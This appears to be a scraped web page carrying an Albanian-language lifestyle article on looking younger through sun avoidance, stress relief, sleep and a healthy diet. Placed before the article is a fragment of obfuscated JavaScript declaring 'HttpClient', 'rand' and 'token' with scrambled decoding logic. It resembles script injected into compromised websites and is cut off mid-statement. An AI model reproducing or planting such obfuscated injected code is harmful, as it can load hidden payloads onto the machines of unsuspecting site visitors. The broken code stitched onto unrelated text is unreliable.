;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këshilla praktike për t’u dukur më e re

By

Pas një viti pandemie të trazuar, ju mund të ndiheni një duzinë vjet më i vjetër. Pas qëndrimit në shtëpi, distancimit shoqëror dhe ngrënies së të gjitha ushqimeve tuaja, mund të dukeni edhe më të vjetër.

Andaj, më poshtë janë disa këshilla të cilat iu ndihmojnë që të dukeni më të ri paraqitje:

Shmangni ekspozimin në diell

“Ekspozimi në diell është faktori më i zakonshëm i jashtëm që ndikon në plakjen e lëkurës”, thotë dr. Rashmi Byakodi. Sipas tij, humbja e kolagjenit konsiderohet zbulimi karakteristik i lëkurës së moshuar. Rrudhjet dhe ndryshimet pigmentare lidhen drejtpërdrejt me foto-plakjen.

Gjeni mënyra për të larguar stresin

“Stresi shoqërohet gjithashtu me stimuj potencialisht të dëmshëm, duke ju bërë të dukeni më të moshuar”, thotë Dr. Byakodi. Ai shton se metodat e relaksimit si frymëmarrja e thellë dhe meditimi mund të ndihmojnë në lehtësimin e stresit.

Kujdesuni që gjatë natës të bëni gjumë të mirë

Të rriturit e rinj të shëndetshëm u fotografuan pas 8 orësh gjumë dhe përsëri pas privimit të gjumit. Vëzhguesve të tjerë u kërkua të vlerësonin tërheqjen e tyre. Kur pjesëmarrësve u mungonte gjumi, ata vlerësoheshin si më pak tërheqës, më të lodhur dhe më pak të shëndetshëm në krahasim me kur ata ishin pushuar, “thotë Janet Hilbert, MD. “

Bërja e një gjumi të mirë natën nuk është e mirë vetëm për trupin dhe mendjen, por gjithashtu përmirëson tërheqjen dhe prirjen e njerëzve të tjerë për t’u shoqëruar me ne”, ka shtuar më tutje ai.

Hani më shëndetshëm

“Ushqimi i shëndetshëm, veçanërisht i dietave me shumë fruta dhe perime. Antioksidantët që gjenden në këto ushqime mund të zvogëlojnë dëmtimin e lëkurës nga radikalet e lira dhe ndotësit”, thotë dr. Poston.

Artikuj të ngjashëm